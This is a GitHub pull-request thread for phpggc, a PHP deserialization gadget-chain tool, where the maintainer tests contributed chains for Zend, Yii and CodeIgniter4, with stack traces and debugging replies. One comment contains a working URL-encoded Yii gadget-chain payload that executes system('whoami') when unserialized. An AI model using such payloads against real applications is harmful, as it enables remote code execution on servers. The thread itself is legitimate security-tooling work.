Open CyanM0un opened 1 year ago
Hello CyanM0un,
That's amazing work ! I'll try and integrate it in the upcoming weeks, as you have said it is a lot of work :)
Charles
Hello,
Still haven't had time to check this amazing work. Will do in the upcoming weeks !
Hello,
I have started working on your GCs, CyanM0un. Every ZendFramework payloads works except for the FI1:
$ php7.1 /tools/web/php/phpggc/phpggc ZendFramework/FI1 --test-payload
Trying to deserialize payload...
PHP Warning: Exception caught by form: Plugin by name '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' was not found in the registry; used paths:
:
Stack Trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2709): Zend_Loader_PluginLoader->load('/tmp/phpggc110c...')
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3458): Zend_Form->_getDecorator('/tmp/phpggc110c...', 'options')
#2 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2864): Zend_Form->_loadDecorator(Array, 'k')
#3 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2992): Zend_Form->getDecorators()
#4 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3010): Zend_Form->render()
#5 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php(263): Zend_Form->__toString()
#6 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#7 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128) in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php on line 3015
PHP Fatal error: Uncaught Zend_Service_Twitter_Exception: Invalid method "detachldap" in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php:266
Stack trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128): Zend_Ldap_Node->detachLdap()
#2 [internal function]: Zend_Ldap_Node->__wakeup()
#3 /tools/web/php/phpggc/lib/test_payload.php(46): unserialize('O:14:"Zend_Ldap...')
#4 {main}
thrown in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php on line 266
FAILURE: Payload did not trigger !
Any ideas why ?
Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load will append a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.
Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load will append a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.
maybe we should specify that the chain only include arbitrary PHP file
Ok, fixed for Zend. Yii2 GCs work as well. Now, Yii/RCE3 tries to use PHPUnit_Extensions_Selenium2TestCase_Session, which is NOT included in the Yii 1.1.20 distribution.
I used the command composer create-project yiisoft/yii=1.1.20 yii1
to create the project for finding GCs. To be honest, I am a little confused about the difference and what the standard way may be. Kindly request your opinion :)
Ok, I used the package present in their github repository.
Do you by any chance still have your vendor/composer/installed.json? Now that I use your procedure, I get:
$ composer create-project yiisoft/yii=1.1.20 yii1
... blabla success
$ cd yii1
$ php7.4 /tools/web/php/phpggc/phpggc Yii/RCE3 --test-payload
Trying to deserialize payload...
PHP Fatal error: Uncaught Error: Call to undefined method DocBlox_Parallel_Worker::curl() in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php:194
Stack trace:
#0 /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php(173): PHPUnit_Extensions_Selenium2TestCase_Session->stop()
#1 [internal function]: PHPUnit_Extensions_Selenium2TestCase_Session->__destruct()
#2 {main}
thrown in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php on line 194
FAILURE: Payload did not trigger !
I don't think that's the problem ... I test it right now using the package and it worked, eg:
<?php
include("./vendor/autoload.php");
include("./framework/YiiBase.php");
$poc = "O%3A11%3A%22CDbCriteria%22%3A1%3A%7Bs%3A6%3A%22params%22%3BO%3A12%3A%22CMapIterator%22%3A3%3A%7Bs%3A16%3A%22%00CMapIterator%00_d%22%3BO%3A5%3A%22CForm%22%3A1%3A%7Bs%3A16%3A%22%00CForm%00_elements%22%3BO%3A44%3A%22PHPUnit_Extensions_Selenium2TestCase_Session%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00commands%22%3Ba%3A1%3A%7Bs%3A6%3A%22itemAt%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00url%22%3BO%3A40%3A%22PHPUnit_Extensions_Selenium2TestCase_URL%22%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00driver%22%3BO%3A23%3A%22DocBlox_Parallel_Worker%22%3A0%3A%7B%7D%7D%7Ds%3A19%3A%22%00CMapIterator%00_keys%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A18%3A%22%00CMapIterator%00_key%22%3Bs%3A6%3A%22whoami%22%3B%7D%7D";
unserialize(urldecode($poc)); // system('whoami')
the error was triggered in the PHPUnit_Extensions_Selenium2TestCase_Session#__destruct()
progress, however the GC's function call should be triggered and finished in the CDbCriteria#__wakeup()
progress, DocBlox_Parallel_Worker
doesn't have the curl
function because in the gadgets.php I simply pick up a class (DocBlox_Parallel_Worker
) and assign it to the driver
field of PHPUnit_Extensions_Selenium2TestCase_Session
, which seems should not influence the command execution
Ok, I was missing the YiiBase import :) Making progress!
Ok, I was missing the YiiBase import :) Making progress!
Indeed a mount of work. 😂 Best respect for you
Hello @CyanM0un !
I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request
, which does not seem to be included in the standard distribution of the framework. I tried:
$ composer create-project codeigniter4/appstarter=4.1.3 hello123
and
$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
Any ideas?
Hello @CyanM0un !
I am back to process a few more GCs. In CI4, RCE7, you use
\Symfony\Component\HttpFoundation\Request
, which does not seem to be included in the standard distribution of the framework. I tried:$ composer create-project codeigniter4/appstarter=4.1.3 hello123
and
$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
Any ideas?
I used the second way, however, after I get the source code I usually use the command composer install
to do the initialization, so \Symfony\Component\HttpFoundation\Request
will be concluded.
Finally, thank you very much for your continued contact. I also admire your work on Iconv, set the charset to RCE
!
(Actually, all these gadget chains I have pulled requests were discovered by our automation tool. I personally think it works very well and I wonder if you could help promote it when we open-source it hahaha :)
Hello @CyanM0un ! I am back to process a few more GCs. In CI4, RCE7, you use
\Symfony\Component\HttpFoundation\Request
, which does not seem to be included in the standard distribution of the framework. I tried:$ composer create-project codeigniter4/appstarter=4.1.3 hello123
and
$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
Any ideas?
I used the second way, however, after I get the source code I usually use the command
composer install
to do the initialization, so\Symfony\Component\HttpFoundation\Request
will be concluded.
This is what I am doing, but still, it does not work:
$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
$ unzip v4.1.3.zip
$ cd framework-4.1.3
$ composer install
$ phpggc CodeIgniter4/RCE7 --test-payload
Trying to deserialize payload...
PHP Fatal error: Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378
Stack trace:
#0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock()
#1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close()
#2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct()
#3 {main}
thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378
FAILURE: Payload did not trigger !
Hello @CyanM0un ! I am back to process a few more GCs. In CI4, RCE7, you use
\Symfony\Component\HttpFoundation\Request
, which does not seem to be included in the standard distribution of the framework. I tried:$ composer create-project codeigniter4/appstarter=4.1.3 hello123
and
$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
Any ideas?
I used the second way, however, after I get the source code I usually use the command
composer install
to do the initialization, so\Symfony\Component\HttpFoundation\Request
will be concluded.This is what I am doing, but still, it does not work:
$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip $ unzip v4.1.3.zip $ cd framework-4.1.3 $ composer install $ phpggc CodeIgniter4/RCE7 --test-payload Trying to deserialize payload... PHP Fatal error: Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378 Stack trace: #0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock() #1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close() #2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct() #3 {main} thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378 FAILURE: Payload did not trigger !
sorry, my URL is https://github.com/codeigniter4/CodeIgniter4/archive/refs/tags/v4.1.3.zip
Hi, I sorted out a few gadget chains of some frameworks. I have manually checked all of them and some of them have passed the test-gc-compatibility script, which I have modified the corresponding version range in the chain.php. It seems like no small work for both of us :)